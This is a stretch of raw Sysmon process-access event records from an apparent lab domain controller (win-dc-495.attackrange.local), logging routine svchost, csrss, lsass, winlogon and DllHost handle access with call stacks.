13:58:17.274{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23e0b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010017Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.274{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010016Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.274{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010015Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.274{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010014Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.274{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010013Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.274{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-0F00-00000000A301}1116C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+f290|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000010012Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.274{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-0F00-00000000A301}1116C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+f290|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000010011Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.274{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+796b|c:\windows\system32\lsm.dll+37c3|c:\windows\system32\SYSNTFY.dll+1dcb|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+527f8|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010010Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.274{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\SYSNTFY.dll+1ad9|C:\Windows\System32\RPCRT4.dll+50ff4|C:\Windows\System32\RPCRT4.dll+24e40|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010009Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.196{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010008Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.196{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010007Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.196{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010006Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.164{59A5CD1D-8E46-6005-1400-00000000A301}13042548C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010005Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.086{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010004Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.086{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010003Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.086{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010002Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.071{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010001Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.071{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010000Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.071{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009999Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.071{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009998Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.071{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009997Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.071{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009996Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.071{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009995Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.055{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93F9-6005-ED04-00000000A301}3532C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009994Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.039{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-93F9-6005-ED04-00000000A301}3532C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 